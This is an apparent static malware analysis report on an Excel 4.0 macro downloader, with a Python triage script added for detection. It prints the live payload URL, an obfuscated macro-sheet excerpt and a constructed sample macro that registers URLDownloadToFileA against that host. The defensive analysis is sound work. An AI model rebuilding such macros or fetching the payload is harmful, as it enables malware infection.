Verdict: MALICIOUS
Risk Score: 290

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
The file contains Excel 4.0 (XLM) macros, flagged by the OOXML_XLM_MACROSHEET and OOXML_XLM_DANGEROUS_FN heuristics. The macro sheet uses the XLM primitives RUN, FORMULA, REGISTER and HALT, and the document's string pool carries the Win32 API names URLDownloadToFileA and ShellExecuteA, consistent with downloading a payload from https://retinaegras.at/3/ebs.dll and executing it. The preview below shows the sheet's entry points dispatching through RUN() to cells scattered across a sheet spanning A5:IO1999, a layout chosen to defeat reading the macro top to bottom. The presence of regsvr32.exe and rundll32.exe in the document text, together with a .dll payload name, suggests the downloaded file is loaded as a DLL rather than run as an executable; this is inferred from static strings, not from observed execution.
Heuristics (7)

- OOXML_XLM_MACROSHEET (critical, 3 related findings): Excel 4.0 macro sheet (1 sheet). The spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft changed the default to block XLM macros. Even legitimate XLM use is rare in modern workbooks.
- OOXML_XLM_AUTOOPEN_DEFINEDNAME (critical): Excel 4.0 Auto_Open defined name. The workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros: execution starts at the named cell as soon as the document is opened with macros enabled.
- OOXML_XLM_DANGEROUS_FN (critical): Dangerous XLM formula APIs: RUN, FORMULA, REGISTER, HALT. The macro sheet uses XLM primitives that reach outside the workbook without invoking VBA. REGISTER and CALL bind and invoke Win32 exports directly, EXEC starts a process, FORMULA writes new formulas into cells at run time (a common way to assemble the real code only while the macro runs), RUN transfers execution to another cell, and HALT ends the macro. These are the building blocks used to download payloads, write files, and start processes from an XLM macro.
- OOXML_XLM_BINARY_WINAPI_STRINGS (critical): Binary XLM macro sheet with WinAPI/download strings. An Excel 4.0 macro sheet stored as BIFF12/XLSB binary data contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
- SE_LOLBIN_RUN_COMMAND (high): LOLBin token sequence in document text. The extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. In HTML/PDF/RTF lures this is a visible "run this" instruction in the body; in macro-laden Office files, as here, it is the macro's own string-pool entries landing next to each other in the extracted text.
- OOXML_HIDDEN_SHEET (low): Hidden worksheet. The workbook contains 9 hidden sheets. Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction; a sheet marked veryHidden cannot be unhidden from the Excel UI at all.
- EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
  - https://retinaegras.at/3/ebs.dll: in document text (OOXML body / shared strings). This is the only actionable URL in the list.
  - http://schemas.openxmlformats.org/spreadsheetml/2006/main: in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/excel/2006/main: in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships: in document text (OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006: in document text (OOXML body / shared strings)
  - http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac: in document text (OOXML body / shared strings)
  The five schemas.* entries are the XML namespace URIs that every OOXML part declares (they are visible in the first line of the macro sheet preview below); they occur in any workbook and carry no signal on their own.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 86968 bytes | 0e85bb43b71619568d81db30d0101046ed0c7237e9e2cb1b6b6a0efbf9f9658c |

Preview (first 1,000 lines of the extracted macro sheet):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:IO1999"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="5" spans="99:228" x14ac:dyDescent="0.25"><c r="HT5" t="b"><f>RUN($GV$1616)</f><v>0</v></c></row><row r="10" spans="99:228" x14ac:dyDescent="0.25"><c r="DN10" t="b"><f>RUN($DX$1447)</f><v>0</v></c></row><row r="16" spans="99:228" x14ac:dyDescent="0.25"><c r="CU16"><v>41</v></c></row><row r="21" spans="10:83" x14ac:dyDescent="0.25"><c r="V21"><v>9</v></c></row><row r="24" spans="10:83" x14ac:dyDescent="0.25"><c r="CE24" t="s"><v>18</v></c></row><row r="25" spans="10:83" x14ac:dyDescent="0.25"><c r="CE25" t="b"><f>RUN($DC$1293)</f><v>0</v></c></row><row r="26" spans="10:83" x14ac:dyDescent="0.25"><c r="AG26"><v>26</v></c></row><row r="27" spans="10:83" x14ac:dyDescent="0.25"><c r="BR27" t="s"><v>22</v></c></row><row r="28" spans="10:83" x14ac:dyDescent="0.25"><c r="J28" t="s"><v>11</v></c><c r="BR28" t="b"><f>RUN($GA$74)</f><v>0</v></c></row><row r="29" spans="10:83" x14ac:dyDescent="0.25"><c r="J29" t="b"><f>RUN($GO$1621)</f><v>0</v></c></row><row r="33" spans="7:249" x14ac:dyDescent="0.25"><c r="G33" t="b"><f>RUN($DO$213)</f><v>0</v></c></row><row r="34" spans="7:249" x14ac:dyDescent="0.25"><c r="AG34" t="s"><v>10</v></c></row><row r="35" spans="7:249" x14ac:dyDescent="0.25"><c r="AG35" t="b"><f>RUN($BY$641)</f><v>0</v></c><c r="CK35" t="b"><f>RUN($GV$1457)</f><v>0</v></c><c r="EM35" t="b"><f>RUN($FZ$139)</f><v>0</v></c><c r="ET35" 
t="s"><v>39</v></c></row><row r="36" spans="7:249" x14ac:dyDescent="0.25"><c r="ET36" t="b"><f>RUN($GI$90)</f><v>0</v></c></row><row r="39" spans="7:249" x14ac:dyDescent="0.25"><c r="DX39" t="b"><f>RUN($CY$160)</f><v>0</v></c><c r="FX39" t="s"><v>51</v></c></row><row r="41" spans="7:249" x14ac:dyDescent="0.25"><c r="IO41" t="s"><v>6</v></c></row><row r="42" spans="7:249" x14ac:dyDescent="0.25"><c r="IO42" t="b"><f>RUN($AG$1492)</f><v>0</v></c></row><row r="43" spans="7:249" x14ac:dyDescent="0.25"><c r="AN43" t="s"><v>44</v></c><c r="GD43"><v>2</v></c></row><row r="44" spans="7:249" x14ac:dyDescent="0.25"><c r="AN44" t="b"><f>RUN($AQ$1963)</f><v>0</v></c><c r="GD44" t="b"><f>RUN($II$1587)</f><v>0</v></c></row><row r="48" spans="7:249" x14ac:dyDescent="0.25"><c r="BP48" t="s"><v>13</v></c></row><row r="49" spans="35:245" x14ac:dyDescent="0.25"><c r="AI49" t="s"><v>9</v></c><c r="BP49" t="b"><f>RUN($GD$1761)</f><v>0</v></c></row><row r="50" spans="35:245" x14ac:dyDescent="0.25"><c r="AI50" t="b"><f>RUN($BW$261)</f><v>0</v></c></row><row r="52" spans="35:245" x14ac:dyDescent="0.25"><c r="CT52" t="s"><v>32</v></c></row><row r="53" spans="35:245" x14ac:dyDescent="0.25"><c r="CT53" t="b"><f>RUN($IB$1240)</f><v>0</v></c><c r="FA53" t="s"><v>0</v></c></row><row r="54" spans="35:245" x14ac:dyDescent="0.25"><c r="BB54" t="s"><v>50</v></c><c r="CE54" t="s"><v>47</v></c><c r="FA54" t="b"><f>RUN($GD$351)</f><v>0</v></c></row><row r="55" spans="35:245" x14ac:dyDescent="0.25"><c r="CE55" t="b"><f>RUN($GG$1768)</f><v>0</v></c></row><row r="60" spans="35:245" x14ac:dyDescent="0.25"><c r="IK60" t="s"><v>12</v></c></row><row r="61" spans="35:245" x14ac:dyDescent="0.25"><c r="GD61" t="b"><f>RUN($BM$1876)</f><v>0</v></c><c r="IK61" t="b"><f>RUN($FB$874)</f><v>0</v></c></row><row r="62" spans="35:245" x14ac:dyDescent="0.25"><c r="FB62" t="s"><v>26</v></c></row><row r="63" spans="35:245" x14ac:dyDescent="0.25"><c r="FB63" t="b"><f>RUN($CU$723)</f><v>0</v></c></row><row r="65" 
spans="12:245" x14ac:dyDescent="0.25"><c r="BM65"><v>707</v></c></row><row r="66" spans="12:245" x14ac:dyDescent="0.25"><c r="BM66 ... (truncated)
```
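The checks the heuristics above describe (macro sheet part, Auto_Open defined name, hidden sheets, dangerous XLM functions, Win32 API strings, LOLBin names, URLs with namespace URIs filtered out) and the RUN() dispatch visible in the preview can be reproduced from the OOXML zip with the standard library alone. The script below is an added example, not the analyzer's own code. It builds a constructed sample workbook in memory with the same shape as this report's file; the sample's formulas, cell addresses and sheet names are assumptions made for the demo, and only the URL and API names are taken from the report.

```python
"""Static XLM triage for an OOXML workbook (added example, not the analyzer's code)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_XM = "http://schemas.microsoft.com/office/excel/2006/main"
NS = {"m": NS_MAIN}

DANGEROUS_FN = {"RUN", "CALL", "EXEC", "REGISTER", "FORMULA", "HALT"}
WINAPI_STRINGS = ("URLDownloadToFileA", "ShellExecuteA", "CreateDirectoryA")
LOLBINS = ("regsvr32", "rundll32", "mshta", "powershell", "cmd")
# Every OOXML part declares these namespace URIs; they are noise, not payload URLs.
NAMESPACE_HOSTS = ("schemas.openxmlformats.org", "schemas.microsoft.com")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
FN_RE = re.compile(r"\b([A-Z][A-Z.]*)\(")               # leading XLM function names
RUN_RE = re.compile(r"RUN\(\$?([A-Z]{1,3})\$?(\d+)\)")  # RUN($GV$1616) -> GV, 1616


def build_sample_xlsx() -> bytes:
    """Constructed sample (not the real file): three parts zipped like an .xlsm."""
    workbook = f"""<workbook xmlns="{NS_MAIN}"><sheets>
<sheet name="Sheet1" sheetId="1"/><sheet name="Macro1" sheetId="2" state="hidden"/>
<sheet name="Stage" sheetId="3" state="veryHidden"/></sheets>
<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$HT$5</definedName></definedNames>
</workbook>"""
    # Auto_Open lands on HT5, which RUN()s to a far-away cell that RUN()s again;
    # the assumed real work starts at DX1447 and proceeds down that column.
    macro = f"""<xm:macrosheet xmlns="{NS_MAIN}" xmlns:xm="{NS_XM}"><sheetData>
<row r="5"><c r="HT5" t="b"><f>RUN($GV$1616)</f><v>0</v></c></row>
<row r="24"><c r="CE24" t="s"><v>0</v></c></row>
<row r="1447"><c r="DX1447" t="b"><f>REGISTER("urlmon","URLDownloadToFileA","JJCCJJ","dl",,1,9)</f><v>0</v></c></row>
<row r="1448"><c r="DX1448" t="b"><f>FORMULA("=dl(0,CE24,CE25,0,0)",DX1450)</f><v>0</v></c></row>
<row r="1449"><c r="DX1449" t="b"><f>HALT()</f><v>0</v></c></row>
<row r="1616"><c r="GV1616" t="b"><f>RUN($DX$1447)</f><v>0</v></c></row>
</sheetData></xm:macrosheet>"""
    shared = f"""<sst xmlns="{NS_MAIN}"><si><t>https://retinaegras.at/3/ebs.dll</t></si>
<si><t>regsvr32.exe</t></si><si><t>ShellExecuteA</t></si></sst>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/macrosheets/sheet1.xml", macro)
        z.writestr("xl/sharedStrings.xml", shared)
    return buf.getvalue()


def run_chain(cells: dict, entry: str, limit: int = 64) -> list:
    """Follow RUN($COL$ROW) hops from the entry cell; stop at a non-RUN cell or a loop."""
    chain, cur = [], entry
    while cur in cells and cur not in chain and len(chain) < limit:
        chain.append(cur)
        m = RUN_RE.fullmatch(cells[cur].strip())
        if not m:
            break
        cur = m.group(1) + m.group(2)
    return chain


def triage(xlsx_bytes: bytes) -> dict:
    """Apply the report's XLM heuristics to one OOXML workbook and return the findings."""
    z = zipfile.ZipFile(io.BytesIO(xlsx_bytes))
    names = z.namelist()
    macrosheets = sorted(n for n in names if n.startswith("xl/macrosheets/"))
    wb = ET.fromstring(z.read("xl/workbook.xml"))
    auto_names = [d for d in wb.iter(f"{{{NS_MAIN}}}definedName")
                  if d.get("name") in ("_xlnm.Auto_Open", "_xlnm.Auto_Close")]
    # "Macro1!$HT$5" -> "HT5"; assumes the single macro sheet is the target.
    entry = auto_names[0].text.split("!")[-1].replace("$", "") if auto_names else None
    hidden = [s.get("name") for s in wb.iter(f"{{{NS_MAIN}}}sheet")
              if s.get("state") in ("hidden", "veryHidden")]
    cells = {}  # cell address -> formula text, across all macro sheets
    for part in macrosheets:
        for c in ET.fromstring(z.read(part)).iter(f"{{{NS_MAIN}}}c"):
            f = c.find("m:f", NS)
            if f is not None and f.text:
                cells[c.get("r")] = f.text
    dangerous = sorted({fn for f in cells.values() for fn in FN_RE.findall(f) if fn in DANGEROUS_FN})
    # String-level checks run over every part, so they also cover sharedStrings.xml.
    text = "\n".join(z.read(n).decode("utf-8", "replace") for n in names)
    return {
        "macrosheets": macrosheets,
        "auto_open": [d.get("name") for d in auto_names],
        "entry_cell": entry,
        "hidden_sheets": hidden,
        "dangerous_fn": dangerous,
        "winapi_strings": sorted(s for s in WINAPI_STRINGS if s in text),
        "lolbins": sorted(b for b in LOLBINS if re.search(rf"\b{b}(\.exe)?\b", text, re.I)),
        "urls": sorted({u for u in URL_RE.findall(text) if not any(h in u for h in NAMESPACE_HOSTS)}),
        "run_chain": run_chain(cells, entry) if entry else [],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample_xlsx()), indent=2))
```

On a real file, pass the bytes of the .xlsm/.xlsx instead of the constructed sample. The RUN() chain walker only resolves direct hops; once it reaches a cell that is not a RUN(), XLM execution continues downward in that column, so read from that cell down. Formulas built with FORMULA() at run time are not visible statically, which is why the string-level checks are kept alongside the formula parse.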